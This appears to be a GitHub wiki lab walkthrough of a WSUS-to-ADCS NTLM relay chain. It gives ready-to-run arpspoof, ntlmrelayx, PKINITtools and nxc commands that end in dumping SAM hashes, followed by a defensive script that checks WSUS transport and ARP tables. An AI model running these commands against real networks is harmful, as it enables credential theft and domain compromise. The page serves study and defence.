MITM: WSUS spoof and ADCS - oscpname/RELAY_scenarios GitHub Wiki

MANUAL: https://j4s0nmo0n.github.io/belettetimoree.github.io/2023-12-01-WSUS-to-ESC8.html

Tools:

  • arpspoof (ARP spoofing)
  • ntlmrelayx.py (Impacket NTLM relay)
  • PKINITtools (gettgtpkinit.py, getnthash.py)
  • nxc (NetExec)

Attack steps:

  1. Intercept Windows Update traffic with an ARP-spoofing attack
  2. Relay the client's NTLM authentication to ADCS web enrollment > get a machine certificate
  3. Obtain a TGT with PKINIT and recover the machine account's NT hash
  4. Impersonate an admin on the target machine

Setup

  • DC-CURSE (192.168.56.105): domain controller (also hosts ADCS web enrollment)
  • WSUS (192.168.56.114): Windows Server Update Services (over HTTP)
  • CURSE-COMP (192.168.56.108): Windows 11 client machine
  • attacker machine (192.168.56.115)

# Intercept Windows Update traffic between the client and the WSUS server (ARP spoofing in both directions)
sudo arpspoof -i enp0s3 -t 192.168.56.108 192.168.56.114
sudo arpspoof -i enp0s3 -t 192.168.56.114 192.168.56.108
# Redirect the intercepted WSUS HTTP traffic (port 8530) to ntlmrelayx listening locally on port 80
sudo iptables -t nat -A PREROUTING -p tcp --dport 8530 -j REDIRECT --to-ports 80

# Relay to ADCS
python3 ntlmrelayx.py -t http://192.168.56.105/certsrv/certfnsh.asp -smb2support --adcs

# With the certificate obtained, authenticate to the domain with PKINIT and get a TGT
# (a.b64 holds the base64-encoded PFX that ntlmrelayx printed for the machine account)
python3 /opt/PKINITtools/gettgtpkinit.py -pfx-base64 $(cat a.b64) 'jjk.local/CURSE-COMP$' 'curse-comp.ccache' -dc-ip 192.168.56.105
export KRB5CCNAME=curse-comp.ccache
klist
# U2U: request a service ticket to ourselves while adding our TGT as "additional tickets";
# -key is the AS-REP encryption key printed by gettgtpkinit.py
python3 /opt/PKINITtools/getnthash.py jjk.local/CURSE-COMP\$ -key f00b6e57ffaf6f23002b39d72ed6f34e0bfa9824db4fe8ccbe28f82b4c96119b
# Verify the recovered NT hash
nxc smb 192.168.56.105 -u CURSE-COMP\$ -H "8a03b8e0fb9728ee5d6dd1eb356a5270"

# Impersonate the administrator on the target machine (S4U2self with the machine account) and dump the SAM hashes
nxc smb CURSE-COMP.jjk.local -u 'CURSE-COMP$' -H '8a03b8e0fb9728ee5d6dd1eb356a5270' --delegate administrateur --self --sam
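The chain above depends on two conditions a defender can check for: WSUS being reachable over plain HTTP (so update traffic can be intercepted and its NTLM authentication relayed) and a neighbour on the segment answering ARP for more than one IP address (the visible footprint of the arpspoof step). The following script is an added example, not part of this wiki page: it audits the Windows Update policy values a client uses (`WUServer` / `WUStatusServer`) for non-HTTPS URLs and flags duplicate MAC addresses in an `arp -a` style table. The policy values, hostnames and MAC addresses are constructed sample data, and the `wsus.jjk.local` hostname is assumed.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: values as exported from the client's
# HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate key.
# The WSUS hostname is assumed for the example.
SAMPLE_WU_POLICY = {
    "WUServer": "http://wsus.jjk.local:8530",
    "WUStatusServer": "http://wsus.jjk.local:8530",
    "AcceptTrustedPublisherCerts": 1,
}

# Constructed sample of `arp -a` output on the client. Two IPs sharing
# one physical address is the indicator we look for.
SAMPLE_ARP = """\
Interface: 192.168.56.108 --- 0x5
  Internet Address      Physical Address      Type
  192.168.56.105        08-00-27-aa-bb-01     dynamic
  192.168.56.114        08-00-27-cc-dd-ff     dynamic
  192.168.56.115        08-00-27-cc-dd-ff     dynamic
"""


def check_wsus_transport(policy):
    """Return a finding per WSUS URL that is not served over HTTPS.

    A plaintext WSUS URL means update requests (and any NTLM
    authentication they carry) can be intercepted and relayed.
    """
    findings = []
    for key in ("WUServer", "WUStatusServer"):
        url = policy.get(key)
        if not url:
            continue
        scheme = urlparse(url).scheme.lower()
        if scheme != "https":
            findings.append(
                f"{key} uses {scheme or 'no'} scheme: {url} "
                "(update traffic can be intercepted and relayed)"
            )
    return findings


# One ARP table row: IPv4 address, MAC (dash or colon separated), type.
ARP_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)


def find_duplicate_macs(arp_text):
    """Map each MAC that answers for more than one IP to the list of IPs.

    A normal segment maps one MAC to one IP; a MAC bound to several IPs
    (here the WSUS address and a second host) is consistent with ARP
    spoofing and is worth correlating with switch port data.
    """
    by_mac = defaultdict(list)
    for line in arp_text.splitlines():
        match = ARP_LINE.match(line)
        if match:
            ip, mac, _arp_type = match.groups()
            by_mac[mac.lower().replace(":", "-")].append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def audit(policy=SAMPLE_WU_POLICY, arp_text=SAMPLE_ARP):
    """Run both checks and return the combined findings."""
    return {
        "wsus_transport": check_wsus_transport(policy),
        "duplicate_macs": find_duplicate_macs(arp_text),
    }


if __name__ == "__main__":
    for name, result in audit().items():
        print(f"{name}: {result}")
```

On a real host the policy values come from the registry key named in the comment and the ARP table from `arp -a`; the remediation for the first finding is to publish WSUS over HTTPS (and to require HTTPS on the ADCS web enrollment endpoint that the relay targets), while the second finding is an indicator to investigate rather than proof by itself.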